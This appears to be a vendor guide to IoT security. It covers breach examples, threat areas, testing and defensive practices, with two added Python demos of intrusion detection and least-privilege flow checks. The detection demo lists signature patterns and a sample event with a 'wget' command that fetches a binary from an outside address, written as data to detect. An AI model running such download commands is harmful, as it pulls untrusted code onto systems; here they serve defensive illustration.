The ultimate guide to IoT security

What is IoT security?

By its nature, IoT opens up networks to the possibility of hacking. That’s because it involves connecting many objects or “things” to the internet that did not previously link to a network. For example, manufacturing companies connect IoT sensors to machinery on the factory floor, while homeowners purchase smart home devices such as thermostats, doorbell cameras, and light switches. 

With the innovation comes new vulnerability. Each connected thing, whether it’s a temperature sensor buried underground or a fitness watch, adds a doorway through which hackers could enter—and potentially bring down entire networks.

IoT security seeks to protect devices and networks, addressing the specific issues inherent to IoT deployments.

Table of contents:

Why is IoT security essential?
How should we approach IoT security?
How does your IoT security program measure up?
What are the biggest concerns for IoT security?
How do you test IoT security?
The future of IoT security

Why is IoT security essential?

Security is a point of pain for many IoT leaders. It’s complicated and overwhelming to secure so many devices and interconnected systems—and the statistics aren’t very encouraging. IoT attacks grew by 600 percent between 2016 and 2017, and 48 percent of businesses can’t detect if their IoT devices suffered a breach. 

Yet IoT security is essential if organizations want to safely realize the power of a connected world. Here’s why:

Data is very valuable—and worth protecting.

In many ways, data is the currency of our day. Organizations collect, store, and analyze tremendous amounts of information, using it to keep daily operations running smoothly and harvesting insights to make decisions. With so much at stake, cyberattacks can be devastating. For example, if a hacker penetrates a manufacturing company’s system and erases their predictive maintenance and productivity data, the company may be forced to halt production and struggle to find their way forward.

IoT security vulnerabilities undermine its success.

If IoT devices and networks are vulnerable to attack, they are of little use to an organization. Once the data is compromised or a hacker shuts down the network, the advantages are negated. Imagine if an agricultural grower sets up an IoT deployment to monitor plant growth, soil temperature and moisture, only to have the system crash when hackers discover and exploit a vulnerability. The grower has come to rely on IoT data to make decisions—and now that data has disappeared.

Cyberattacks on IoT devices can lead to compromised privacy and even physical injury.

Because IoT devices track many kinds of information, access to that breadth of data can give hackers unprecedented power. For example, if bad actors break into a network of connected cars, they could take control of the vehicles while passengers are inside—resulting in their injury or death. Cyberthreats against health IoT devices such as pacemakers are another example of serious security risks. The more personal information is collected and stored on digital devices, the more risk there is for organizations and consumers alike.

How should we approach IoT security?

Here’s some good news about IoT security risks: history repeats itself. While the details of cybersecurity attacks change from day to day, they’re often rehashes of the same incidents that have been occurring since the birth of the internet in the 1990s. 

The most effective approach to IoT security starts with taking a close look at the history of cyberattacks and security vulnerabilities across the computer network landscape, identifying the recurring themes, and creating a built-in IoT security plan for your deployment that addresses each common area of vulnerability. Let’s start by taking a closer look at a few IoT security breaches and hacks.

Examples of IoT security breaches and hacks

Because IoT hacks can happen to any type of connected thing, instances of security breaches include the unexpected and the bizarre.

Baby monitors

Baby monitors have gone from being simple radio transmitters to sophisticated video devices connected to the internet via WiFi. These features enable parents to keep watch over a sleeping child from their smartphone, but they also create an open door for hackers. In 2018, parents of a four-month-old baby in Texas heard a stranger’s voice over their video monitor, threatening to kidnap their baby. Once they realized it was a hacker and not someone in their home, they disconnected the device and called the police. These types of hacks are not difficult for bad actors to instigate if device users rely on default passwords.

Connected cars

In 2015, two hackers remotely took control of a Jeep Cherokee using vulnerabilities in the car’s entertainment system to access its dashboard functions. The two hacker-researchers commandeered the car while a journalist was behind the wheel, initiating a series of unexpected disturbances and finally disabling the brakes, causing the driver to swerve into a ditch. The experiment demonstrates just how serious IoT security vulnerabilities can be.

Point of Sale (POS) Systems

In 2014, hackers used login information from an HVAC company to break into Target’s POS system. The HVAC company had login credentials with the retailer to carry out remote monitoring tasks, evaluating and adjusting energy consumption at retail stores. Once the hackers were inside Target’s network, they uploaded malware to the POS systems and stole data from 40 million debit and credit cards in the U.S., Brazil, and Russia.

Thermostats

There have been a number of hacks to connected thermostats over the past few years, typically due to weak or compromised passwords. In 2016, hackers broke into the heating system at a pair of apartment buildings in southeast Finland, launching a distributed denial-of-service (DDoS) attack that disabled the heating system for nearly a week. And in 2019, a hacker broke into a Wisconsin couple’s smart home, turned the thermostat up to 90 degrees, and spoke to them through a camera in their kitchen.

How does your IoT security program measure up?

An IoT cyberattack can happen anywhere, to any kind of connected device. It’s essential to look at every network element and every piece of hardware as a potential entry point—and act aggressively to protect those doorways. 

Every successful IoT security program must address four basic areas. Before you do anything else, take a moment to assess the state of your organization’s IoT security protocol using this checklist.

How does your IoT security program address:

Internal threats?

(How do you ensure vendor alignment? What measures are in place to detect hidden malware and monitor logging practices? How do you detect internal bad actors?)

External threats?

(How does your organization safeguard against external hackers who may spread malware and perpetrate ransomware attacks?)

Privacy?

(Is encryption effective? Is your network private?)

Compliance?

(Which regulations are you subject to? How do you ensure compliance?)

If your responses were vague or incomplete, you’re not alone.

Cybersecurity is one of the major thorns in the side of IoT at the moment. As more devices, vendors, and networks become involved, ensuring security becomes increasingly complicated. But if you think critically and make sure you’re paying attention to each major area of concern, IoT security is quite achievable.

What are the biggest concerns for IoT security?

Let’s take a closer look at these four main areas of concern for IoT security.

Internal threats

The phrase “internal cyber threats” conjures up images of malicious employees who intentionally leak sensitive information. But while it’s important to safeguard against bad actors, the vast majority of internal threats in IoT networks come from ignorance or negligence about best practices. Here are a few essential areas to focus on when you’re creating or refining IoT security policies:

Vendor alignment

One weakness of IoT security occurs when organizations unite hardware and software elements from different vendors who may not be working together to achieve optimum security. For example, a connected car manufacturer may have a vendor deep inside their system who’s not worrying about security because they make a vehicle part that’s normally not connected to the internet. When connected, that part becomes a security risk. Ultimately, the weakest link in your chain of vendors becomes a potential entry point for hackers. To offset that risk, work toward vendor alignment: look for vendors who share your security standards and ensure that every connection point in your hardware and software chain is secured.

Intrusion detection systems

A software application or device that monitors your network for suspicious activity, an intrusion detection system is an essential step toward safeguarding against internal (and external) cyber threats. Intrusion detection systems may use signature-based detection to find malware or other bad patterns, or anomaly-based detection to highlight deviations from normal activity.
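The two detection styles described above, shown side by side as an added example (not code from this guide or from any vendor it mentions). The device names, byte patterns, and traffic figures are constructed for illustration, and the three-standard-deviation threshold is an assumption.

```python
from statistics import mean, stdev

# Constructed signatures: byte patterns treated as known-bad for this demo only.
SIGNATURES = {
    "default-cred-login": b"user=admin&pass=admin",
    "shell-download": b"wget http://",
}

# Constructed events: one payload per message seen on the device network.
EVENTS = [
    {"device": "thermostat-01", "payload": b"POST /telemetry temp=21.5"},
    {"device": "camera-07", "payload": b"POST /login user=admin&pass=admin"},
    {"device": "camera-07", "payload": b"cmd=wget http://198.51.100.9/fw.bin"},
]

# Constructed traffic history (bytes per minute) and the latest reading per device.
BASELINE = {
    "thermostat-01": [510, 495, 502, 498, 505],
    "camera-07": [20000, 21000, 19500, 20500, 20200],
}
CURRENT = {"thermostat-01": 500, "camera-07": 95000, "sensor-99": 300}


def signature_alerts(events):
    """Signature-based: flag any payload that contains a known-bad pattern."""
    hits = []
    for ev in events:
        for name, pattern in SIGNATURES.items():
            if pattern in ev["payload"]:
                hits.append((ev["device"], name))
    return hits


def anomaly_alerts(baseline, current, threshold=3.0):
    """Anomaly-based: flag devices far from their own historical traffic level."""
    alerts = []
    for device, value in current.items():
        history = baseline.get(device, [])
        if len(history) < 2:
            # A device with no history is itself worth a look.
            alerts.append((device, "no-baseline"))
            continue
        mu = mean(history)
        # Floor sigma so a perfectly flat history does not divide by zero.
        sigma = max(stdev(history), 1.0)
        z = (value - mu) / sigma
        if abs(z) > threshold:
            alerts.append((device, f"z={z:.1f}"))
    return alerts


if __name__ == "__main__":
    print(signature_alerts(EVENTS))
    print(anomaly_alerts(BASELINE, CURRENT))
```

The signature pass only catches patterns someone has already written down, while the anomaly pass catches the camera's traffic spike and the unknown sensor without knowing what either is doing.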

Employee adherence to cybersecurity best practices

Making sure employees are well-versed in cybersecurity best practices should be an ongoing effort in any organization, especially those utilizing or designing IoT devices. Because the threat landscape is always changing, it’s important to schedule frequent check-ins to keep teams in the loop.

Change management

A good change management system requires approval and record-keeping to prevent unauthorized changes from occurring. Change management reduces the risk caused by the human element, which can include errors as well as social engineering. It creates a standard process that all personnel must follow strictly for any changes to network access control or device management.

Principle of least privilege

An IoT device on your network shouldn’t have access to other devices on your network by default, because those unnecessary links create additional attack surfaces. Enforcing the Principle of Least Privilege helps to restrict access between devices. Role-based control, a tool within some IoT platforms that allows you to restrict network and account access depending on the person’s role, is another helpful security precaution for any company developing or deploying IoT.
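A default-deny flow check illustrating the least-privilege rule above, as an added example (not code from this guide or from any IoT platform). The addresses, roles, ports, and rule layout are all hypothetical.

```python
import ipaddress

# Constructed inventory: device IP -> role.
DEVICES = {
    "10.20.1.5": "sensor",
    "10.20.1.9": "camera",
}

# Constructed allow rules: role -> list of (destination CIDR, port).
# Anything not listed here is denied, including device-to-device traffic.
ALLOW = {
    "sensor": [("10.20.0.10/32", 8883)],  # telemetry broker
    "camera": [("10.20.0.20/32", 443)],   # video ingest service
}

# Constructed observed flows: (source IP, destination IP, destination port).
FLOWS = [
    ("10.20.1.5", "10.20.0.10", 8883),
    ("10.20.1.9", "10.20.1.5", 23),
    ("10.20.1.9", "10.20.0.20", 443),
    ("10.20.1.5", "203.0.113.50", 443),
    ("10.20.1.77", "10.20.0.10", 8883),
]


def evaluate(src, dst, port):
    """Return ("allow" | "deny", reason) for one flow under default-deny."""
    role = DEVICES.get(src)
    if role is None:
        return ("deny", "unknown-source")
    dst_ip = ipaddress.ip_address(dst)
    for cidr, allowed_port in ALLOW.get(role, []):
        if dst_ip in ipaddress.ip_network(cidr) and port == allowed_port:
            return ("allow", f"{role}-rule")
    if dst in DEVICES:
        # One device reaching another is the lateral path least privilege removes.
        return ("deny", "device-to-device")
    return ("deny", "not-allowlisted")


def audit(flows):
    """Return every denied flow with the reason, ready to log or alert on."""
    denied = []
    for flow in flows:
        verdict, reason = evaluate(*flow)
        if verdict == "deny":
            denied.append((flow, reason))
    return denied


if __name__ == "__main__":
    for flow, reason in audit(FLOWS):
        print(flow, reason)
```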

External threats

Threats from outside your immediate IoT network can come from anywhere, in any number of forms. There’s no way to anticipate every possible threat, but there are things you can do to ensure network security and make it very difficult for a bad actor to break in.

Securing backdoors and open ports

Oversights such as backdoors and open ports can lead to serious cyberthreats. To the best of your organization’s ability, eliminate these open doors and utilize network monitoring, anti-malware solutions, and/or multiple firewalls as added layers of protection.

Firewalls

In IoT security, firewalls are essential—and should come in several layers. Network operators should implement multiple firewalls to detect and log anomalous traffic and unexpected port access attempts. Set up your system to trigger alerts so you’ll be notified immediately if something is amiss.

Password management

Everyone knows it’s important to use strong passwords and change them regularly—but many organizations still struggle to stay up-to-date on this key element of security. Some IoT devices come pre-loaded with default passwords set by the manufacturer, creating an open door for hackers to penetrate the network. If your devices operate with traditional passwords, change them often or consider using an automated password management system. Today’s cellular IoT devices may also use authentication as an additional layer of security, such as Hologram’s multi-factor authentication for connected devices.

Disaster recovery plan and data backup

Backing up your systems is a given, but with the amount of data gathered in today’s organizations, it can be an overwhelming task. Even if data is backed up, you need to make sure you can restore it quickly—so you can avoid costly network downtime. These details should be worked out in a disaster recovery plan (DRP), an essential roadmap to the policies and procedures your organization will use to cope with a physical disaster or large-scale cyberattack.

Privacy

Whether your IoT devices measure moisture levels in the soil or the heart rates of cardiac patients, the data they gather must be kept within prescribed boundaries of privacy. Data privacy means safeguarding information on its entire path from creation to processing—in the case of IoT, from the edge to the cloud and beyond—to ensure that third parties cannot gain access to it without authorization.

Data privacy policy

If your organization handles client or consumer information, it’s important to establish a data privacy policy to set the groundwork for how you will handle regulatory compliance and safeguard the data that passes through your network of IoT devices. Based on the policy, you can create a data privacy statement to share with clients.

Private IPs

A private IP is part of a private network, meaning that an internet destination cannot send traffic to it directly. The firewall intercepts the traffic and makes decisions on whether it goes through or not. Using private IP addresses (made possible when firewalls are in place) provides another layer of protection for your IoT devices.

Secure tunneling

Secure tunneling solutions (such as Hologram Spacebridge) allow you to tunnel into the security domain associated with your own devices. By creating a secure, authenticated tunnel, you can send inbound traffic to any port on an IoT device. Essentially, a tunnel is a closely guarded gate that lets you in to where you need to go.

Encryption

Encrypting data is a given for cybersecurity, but in the world of IoT, it’s not always end-to-end. That’s because IoT data often passes through different systems and software as it traverses the path from edge to cloud—making it harder to ensure constant encryption. Some companies are working toward open-source solutions that are compatible across platforms, but they’re still in development. With this awareness, work toward a solution that guarantees encryption for your IoT data, both in transit and at rest.

Compliance

Compliance does not equate to security

Depending on your industry and location, IoT devices and computer networks will need to comply with a checklist of regulations created by a governing body. But while essential, regulatory compliance does not always add up to IoT security. They are different goals, and need to be approached differently.

Know the requirements and demonstrate compliance

While there’s no single federal law governing data privacy in the U.S., many states have passed their own. Ensure that you’re familiar with the government regulations and industry standards that apply to your organization, and have systems in place that can detect and demonstrate compliance. (For example, data protection services often generate periodic reports on regulatory compliance.)

Keep up with changes and updates

Local, state, and federal laws are always being added, along with additional requirements from governing bodies within industries. It’s essential to stay ahead of new regulations, so set up a system and regular meetings to review and plan for approaching changes.

How do you test IoT security?

Once you’ve evaluated your IoT security program and made changes to strengthen it, how can you ensure that your approach is working? Using standard cybersecurity testing methods, your team or a third party can evaluate the strength of your IoT security. Here’s how:

Penetration testing

Commonly used to test traditional computer networks, penetration testing can also identify vulnerabilities in an IoT network—but the process may be complicated. IoT devices and networks use a wide variety of architectures (SuperH, MIPS, or ARM, for example) and communication protocols (such as BLE, Zigbee, SDR, and Sigfox), which penetration testers must be familiar with. There are many moving parts in an IoT deployment, and it’s easy to miss potential points of vulnerability, so you might consider hiring a third party that specializes in IoT security testing.

Device hardware analysis

Analyzing and testing device hardware is another essential component of evaluating your IoT security. These penetration tests look at internal communications protocols such as UART, I2C, and SPI; check for open ports; experiment with the results of tampering; and carry out JTAG debugging.

Threat modeling

Threat models analyze applications to identify vulnerabilities and call attention to them. For IoT devices and networks, threat modeling provides a clear evaluation of the whole picture and highlights the possibility for specific incidents such as WiFi jamming, device hijacking, or the introduction of targeted malware.

The future of IoT security

The future of IoT depends on its security. As device and networking technology evolves, so will security safeguards and standards. Several organizations, including the IoT Security Foundation and GSMA, have already developed sets of security best practices and guidelines for IoT. Until there are overarching standards for IoT security, organizations and developers need to be extra vigilant about building security into devices and networks, staying up-to-date on the latest threats, and continuing to test and evaluate their approach to security.